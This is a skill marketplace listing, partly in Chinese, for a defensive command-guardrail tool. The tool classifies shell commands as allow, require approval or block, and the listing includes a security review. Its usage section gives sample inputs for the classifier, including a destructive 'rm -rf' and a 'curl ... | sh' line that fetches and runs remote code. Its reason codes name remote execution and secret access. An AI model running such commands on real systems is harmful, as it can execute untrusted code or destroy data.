← 返回 Skills 市场

DeepInspect Guardrails

Name: DeepInspect Guardrails
Author: parmindersk

作者 parmindersk · GitHub ↗ · v1.0.0

cross-platform ✓ 安全检测通过

584

总下载

当前安装

版本数

在 OpenClaw 中安装

/install deepinspect-openclaw-guardrails

功能描述

Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes.

使用说明 (SKILL.md)

OpenClaw Guardrails (MVP)

DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.

What it does (MVP)

Classifies requested command risk
Returns allow, require_approval, or block
Emits reason codes for explainability
Uses a baseline balanced profile in policy.baseline.json

Decision outputs

allow
require_approval
block

Reason codes (examples)

REMOTE_EXEC_PATTERN
DESTRUCTIVE_PATTERN
PRIVILEGE_ESCALATION_PATTERN
SYSTEM_MUTATION_PATTERN
SECRET_ACCESS_PATTERN
OUTSIDE_WORKSPACE_PATH

Local usage

node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"

Run tests

node skills/openclaw/guardrails/tests/decide.test.js

How to tune policy

Edit:

workspaceRoots
allowlistedDomains
highRiskPatterns
actions

in policy.baseline.json.

安全使用建议

This skill appears to implement what it claims: a local preflight classifier for shell-like commands. Before installing or running it: (1) ensure you have Node.js available (SKILL.md assumes node but required-binaries is empty), (2) review and, if needed, adjust policy.baseline.json.workspaceRoots to match your actual project workspace so OUTSIDE_WORKSPACE_PATH detection is meaningful, (3) verify the allowlistedDomains entry if you expect network checks (the code doesn't use it), and (4) because the source is 'unknown', inspect the included files yourself before granting any automation privileges — running the CLI locally is low-risk, but don't enable autonomous invocation in an environment where unreviewed skills can run commands without supervision.

功能分析

Type: OpenClaw Skill Name: deepinspect-openclaw-guardrails Version: 1.0.0 This skill bundle implements a security guardrail system designed to classify command-like actions based on predefined risk patterns. The code in `src/decide.js` and `policy.baseline.json` explicitly looks for indicators of malicious behavior (e.g., remote execution, destructive commands, privilege escalation, secret access, sensitive path access) to block or require approval for such actions. The `SKILL.md` documentation accurately describes this purpose and provides examples for testing the guardrail's detection capabilities, not for the agent to execute maliciously. There is no evidence of data exfiltration, malicious execution, persistence mechanisms, or prompt injection attempts against the agent; rather, the skill aims to prevent these very actions.

能力评估

✓ Purpose & Capability

The name/description match the implementation: the code classifies command strings into allow/require_approval/block and emits reason codes. The policy file contains patterns and actions that the code uses. One minor inconsistency: policy.baseline.json contains an allowlistedDomains field that is not referenced by the implementation (harmless but unused).

✓ Instruction Scope

SKILL.md directs local use of the provided node CLI and tests. The instructions and code only read the bundled policy file and the provided command string; they do not access external endpoints, environment secrets, or unrelated system configuration.

ℹ Install Mechanism

No install spec is present (lowest risk) and all code is local. However, SKILL.md and the CLI require node to run but the registry metadata lists no required binaries — this is a minor coherence gap (you need node/npm on PATH to run the skill). There are no remote downloads or archive extracts.

✓ Credentials

The skill requests no environment variables or credentials and the code does not read secrets or config paths beyond the included policy file. The policy flags patterns that match sensitive paths (e.g., ~/.ssh, /etc) but the skill only detects those patterns rather than accessing those files.

✓ Persistence & Privilege

The skill does not request persistent presence, does not write global agent configuration, and does not require elevated privileges. The skill is user-invocable and not always-enabled.

如何使用

确保已安装 OpenClaw（本地或 Docker 部署）
在对话框中输入安装命令：/install deepinspect-openclaw-guardrails
安装完成后，直接呼叫该 Skill 的名称或使用 /deepinspect-openclaw-guardrails 触发
根据 Skill 的参数说明提供必要输入，即可获得结构化输出

版本历史

v1.0.0

Initial release of OpenClaw Guardrails: - Provides deterministic risk classification for command-like actions: allow, require_approval, or block. - Emits reason codes for explainability (e.g., REMOTE_EXEC_PATTERN, DESTRUCTIVE_PATTERN). - Uses a baseline policy profile (policy.baseline.json) for decisions. - Includes local CLI for testing command classifications. - Supports policy tuning via editable JSON settings.

元数据

Slug deepinspect-openclaw-guardrails

版本 1.0.0

许可证 —

累计安装 0

当前安装数 0

历史版本数 1

常见问题